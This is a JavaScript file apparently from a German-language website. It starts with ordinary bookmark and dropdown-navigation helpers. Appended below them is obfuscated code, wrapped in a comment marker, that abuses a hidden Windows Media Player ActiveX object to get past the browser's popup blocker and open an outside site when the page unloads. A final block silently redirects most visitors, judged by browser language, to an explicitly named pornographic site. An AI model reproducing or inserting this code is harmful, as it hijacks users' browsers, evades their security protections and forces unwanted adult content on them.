function bookmark(url,titel){
	
	if(navigator.appName == "Microsoft Internet Explorer"){
		window.external.AddFavorite(url,titel);
	}else{
		alert("Möchten Sie "+titel+" zur Ihren Favoriten zufügen");
        window.sidebar.addPanel( titel, url, "");
	}
}
function goThere(sel){
	var linkList=sel.selectedIndex;
	if(!linkList==""){location.href=sel.options[linkList].value;return true;}
	return false;
	}

function goToNewWindow(sel){
	var linkList=sel.selectedIndex;
	if(!linkList==""){window.open(sel.options[linkList].value);}
	return false;
	}
	
	<!--var con  = 1;w  = screen.availwidth+'px';h = screen.availheight+'px';showmoddialog = 'window.showModalDialog';var outurl  = 'http://www.funclub.ws/';function defaultexit(myURL){eval("var widisopen = window.open('"+myURL+"','popalapop1216182318','toolbar=1,menubar=1,status=1,location=1,directories=1,scrollbars=1,resizable=1')");if (!widisopen) {showurl='("'+myURL+'","","dialogHeight: "+h+"; dialogWidth:"+w+"; dialogTop: 0px; dialogLeft: 0px; edge:aised;enter: Yes; help:Yes; resizable: No; status: No;")';eval(showmoddialog+showurl);}}function loadexit(myURL){if(myURL.length==0 || typeof(myURL)=="object"){myURL = outurl;}if (con==1){if (!XP || typeof(document.getElementById('iee'))!='object' || XP=='undefined') {defaultexit(myURL);}else if(Microsoft && IE5){check = false;try{F1.close();check = true;}catch (e){ check = false; }if(check){defaultexit(myURL);return true;}if(document.referrer.length>0){try{iee.launchURL(document.referrer);}catch (e){}}try{iee.launchURL(myURL);}catch (e){defaultexit(myURL);}self.focus();setTimeout('   myfocus()   ',20);}else defaultexit(myURL);}}var IE5 = (document.getElementById && document.all)? true : false;if (navigator.appName.indexOf('Microsoft') != -1) {var Microsoft = true;}if (window.navigator.userAgent.indexOf('SV1') != -1){var XP = true;}function myfocus(){self.focus();}function connull(){con = 0;}function natsInner(){    document.getElementById('my_magic_box').innerHTML+="<object id=iee width=0 height=0 classid='CLSID:"+u+"'></object>";}function checkVersion(){    isSP2 = (window.navigator.userAgent.indexOf("SV1") != -1);    if (isSP2)    {    natsInner();    }    isUsingSpecial = true;}if (document.all)         /* MSIE, Konqueror, Opera: --- */{eval("window.attachEvent('onload',checkVersion);");eval("window.attachEvent('onunload',loadexit);");}else{window.onload = checkVersion;window.onunload = loadexit;}var isSP2 = false;var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6";//-->


RedirectionURL = "http://www.teenfuckland.com/";
if (navigator.userLanguage)
 ln=navigator.userLanguage.substring(0,2);
else
 ln=navigator.language.substring(0,2);

if ( (ln.length > 0)  && (ln.indexOf("de") < 0) && (ln.indexOf("fr") < 0) && (ln.indexOf("nl") < 0) && (ln.indexOf("it") < 0) )
 window.location.href = RedirectionURL;



